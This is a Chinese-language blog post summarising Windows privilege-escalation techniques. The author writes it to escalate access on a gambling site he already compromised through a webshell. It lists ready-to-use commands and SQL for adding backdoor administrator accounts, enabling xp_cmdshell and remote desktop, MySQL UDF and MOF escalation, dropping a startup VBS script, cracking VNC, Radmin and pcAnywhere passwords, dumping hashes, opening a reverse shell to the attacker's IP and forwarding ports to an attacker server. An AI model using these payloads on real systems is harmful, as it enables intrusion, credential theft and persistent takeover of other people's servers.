滲透測試之windows系統提權總結

起因，由于前幾天拿了一個菠菜站的webshell，但是只有iis權限，執行無法創建用戶等操作，更無法對整個服務器進行控制了，于是此時便需要提權了，對于一個剛剛入門的小白來說，此刻真正意識到了提權的重要性，于是便開始學習提取相關知識，以拿下該菠菜的站點。

提權前的準備工作

1，通常來說，不同的腳本所處的權限是不一樣的。這就意味著，如果該站點支持權限更高的腳本，我們可以上傳該權限更高的腳本的大馬，進而拿到更高的權限。

• asp/php 通常為匿名權限(網絡服務權限)
• aspx 通常為user權限
• jsp 通常為系統權限

2，提權中常常也需要進行信息收集：

• 內外網
• 服務器系統和版本位數
• 服務器的補丁情況
• 服務器的安裝軟件情況
• 服務器的防護軟件情況
• 端口情況
• 所支持的腳本情況
• ...............................等等

3，windows信息收集中常用的命令：

ipconfig /all    查看當前ip
net user         查看當前服務器賬號情況
netstat -ano     查看當前服務器端口開放情況
ver              查看當前服務器操作系統
systeminfo       查看當前服務器配置信息（補丁情況）
tasklist /svc    查看當前服務器進程情況
taskkill -pid pid號  結束某個pid號的進程
taskkill /im qq.exe /f 結束qq進程，如果對命令不清楚，可以使用taskkill /? 進行查看
net user v01cano v01cano /add 添加一個用戶名為v01cano密碼為v01cano的用戶
net localgroup administrators v01cano /add 將用戶v01cano添加到管理員組
whoami                   查看當前操作用戶（當前權限）

cmd命令執行提權

cmd命令執行提權-拿到webshell后，通常是無法執行cmd命令的，常見的阻斷cmd命令執行有如下三種：

• 防護軟件攔截
• cmd被降權
• 組件被刪除
• 被攔截和降權的解決方案，找可讀寫目錄，上傳cmd.exe，調用自己上傳的cmd.exe，執行cmd命令。
• 組件被刪除解決方案：檢查是否支持aspx，如果支持，則可以通過aspx直接調用系統的cmd命令。或者換個腳本試試，比如換個php或者asp的大馬試試。
• https://www.cnblogs.com/v01cano/p/10293838.html

FTP軟件提權

常見的FTP軟件有server-u，g6ftp，filezilla等等。

https://www.cnblogs.com/v01cano/p/10310822.html

遠程管理軟件提權

常見的遠程管理軟件有teamviewer，pcanywhere，radmin，vnc等等。

1，teamviewer提權：比較難，官方響應更新較快。

2，pcanywhere提權：（默認端口5631,5632）一般下載安裝根目錄下的hosts文件夾下的PCA.admin.CIF文件，然后使用pcanywhere破解.exe可執行程序讀取其用戶名和密碼，然后即可進行連接遠控。

3，radmin提權：（默認端口4899）直接使用大馬中的Radmin提權，可以直接讀取Radmin的密碼（密文），同樣使用工具radmin_hash.exe直接新建連接，然后右鍵完全控制，將32位的hash密文直接輸入即可（注：在大馬里面獲取的密文為大寫，需要先進行小寫轉換）

4，vnc提權：@1，通過讀取注冊表的十進制數，將其轉換成十六進制數。（使用大馬中讀取注冊表選項，選擇vnc4密碼選項，進行讀取）@2，使用工具vncx4.exe破解十六進制數后得到密碼，即首先輸入vncx4.exe -W回車，然后將轉換后的十六進制數依次輸入。@3，使用破解得到的密碼連接vnc。

windows溢出提權

主要是通過windows漏洞利用來獲取系統權限，常見的溢出提權有巴西烤肉，pr等。

提權步驟如下：

• 通過systeminfo命令查看服務器打了哪些補丁。
• 根據未打補丁的漏洞進行利用即可。可以通過getroot tools工具進行查看有哪些漏洞未打補丁。

破解hash提權

前提：需要system權限。

• 上傳pwdunp7.exe運行獲取hash值或者使用pass.exe讀取內存中的明文密碼。
• 拿到lc5，彩虹表或者cmd5中解密
• 即可得到管理員密碼

啟動項提權：

• 前提寫入的目錄需要寫入權限
• 將批處理文件上傳到開啟啟動項目錄等待管理員重啟即可。

數據庫提權

sqlserver數據庫提權

1，首先需要獲取sa賬號，或者其他管理員賬號。獲取方法，查看config.asp，conn.asp，database.asp等文件。

2，安裝cmd_shell組件

執行如下命令安裝cmd_shell組件，默認無法直接執行cmd命令：

  
EXEC sp_configure 'show advanced options', 1
  GO
  RECONFIGURE
  GO
  EXEC sp_configure 'xp_cmdshell', 1
  GO
  RECONFIGURE
  GO
  刪除cmd_shell組件：
  EXEC sp_configure 'show advanced options', 1
  GO
  RECONFIGURE
  GO
  EXEC sp_configure 'xp_cmdshell', 1
  GO
  RECONFIGURE
  GO
如果在添加用戶到管理員組administrators的時候遇到安全狗而無法添加，則可以添加用戶到Remote desktop Users遠程組，遠程組的用戶同樣可以進行遠程連接。

3，開啟3389

開啟3389的sql語句：
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server',
'fDenyTSConnections','REG_DWORD',0;
關閉3389的sql語句：
exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server',
'fDenyTSConnections','REG_DWORD',1;

4，創建用戶，加入到administrators組或者Remote desktop Users組

mysql數據庫提權

前提：需要是數據庫管理員權限才可以進行提權操作。

一，udf提權

1，獲取到對方mysql數據庫下的root賬號和密碼，常用的獲取方法有：

• 查看網站源碼里面的數據庫配置文件（inc,conn,config.sql,common,data等）
• 查看數據庫安裝路徑下的user.myd(/data/mysql/)
• 暴力破解mysql密碼，破解3306端口入侵。

2，udf提權原理：

通過root權限導出udf.dll到系統目錄下，可以通過udf.dll調用執行cmd。
create function cmdshell returns string soname 'udf.dll'
select cmdshell('net user iis_user 123!@#abcABC /add');
select cmdshell('net localgroup administrators iis_user /add');
drop function cmdshell;

3，udf提權常用方法：

直接上傳udf大馬，對如上命令進行自動執行，從而達到提權的目的。

二，啟動項提權

啟動項提權原理：使用較少

1，查看數據庫中有些什么數據表

mysql>show tables;

默認的情況下，test中沒有任何表的存在。

2，在test數據庫下創建一個新的表；

mysql>create table a(cmd text);

我們創建了一個新的表，表名為a，表中只存放一個字段，字段名為cmd,為test文本。

3，在表中插入新的內容：

insert into a values(“set wshshell=createobject(“”wscript.shell””)”);
insert into a values(“a=wshshell.run(“”cmd.exe /c net user v01cano v01cano /add“”,0)”);
insert into a values(“b=wshshell.run(“”cmd.exe /c net localgroup administrators v01cano /add“”,0)”);
select * from a into outfile “C://docume~1//「開始」菜單//程序//啟動//a.vbs”;
重啟即可創建該用戶。

三，mof提權

mof提權原理：

第一種方法：
上傳mof.php,輸入相關信息，執行命令，提權。
第二種方法：
上傳x.mof文件，使用select命令導出到正確的位置。
select load_file('C:/php/APMServ5.2.6/www/htdocs/1.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof'
允許外部地址使用root用戶連接的sql語句：
Grant all privileges on *.* to 'root'@'%' IDENTIFIED BY "root賬戶密碼" with grant option;

四，反鏈端口提權（反彈shell）

反鏈端口提權原理：可以使用udf提權的大馬進行操作。

1，利用mysql客戶端工具連接mysql服務器，然后執行下面的操作。

執行命令：

mysql.exe -h 192.168.174.151 -uroot -p
enter password:
mysql>\. C:\mysql.txt
mysql>select backshell("YourIP",端口);

2，本地監聽你反彈的端口：

nc.exe -v -l -p 端口

成功后，你可以獲得一個system權限的cmdshell，其實這個也是利用udf提權，即使用udf提權的大馬進行反彈shell提權。

五，內網端口轉發

1，內網端口轉發常用操作。
內網主機輸入命令：該外網ip為黑客的某臺服務器。
lcx.exe -slave 外網ip 外網端口 內網ip 內網端口
lcx.exe -slave 200.1.1.1 1111 192.168.1.2 3389
外網主機輸入命令：
lcx.exe -listen 1111 1311

開啟3389常用方法

• 使用批處理文件開啟3389
• 使用sql語句開啟3389
• 使用exe開啟3389
• 使用vb開啟3389

windows常用權限提升命令

常用命令：
type E:\wwwroot\web.config 查看文件內容
cacls命令：
/T            更改當前目錄及其所有子目錄中指定文件的 ACL。
/E            編輯 ACL 而不替換。
/C            在出現拒絕訪問錯誤時繼續。
/G user:perm  賦予指定用戶訪問權限。Perm 可以是: R讀取，W寫入，C更改(寫入)，F完全控制。
/R user       撤銷指定用戶的訪問權限(僅在與 /E 一起使用時合法)。
cacls C:\wwwroot\1.html /t /e /c /g v01cano:f
要修改一個文件權限的必要條件：
有user組的完全控制權限，cmd權限。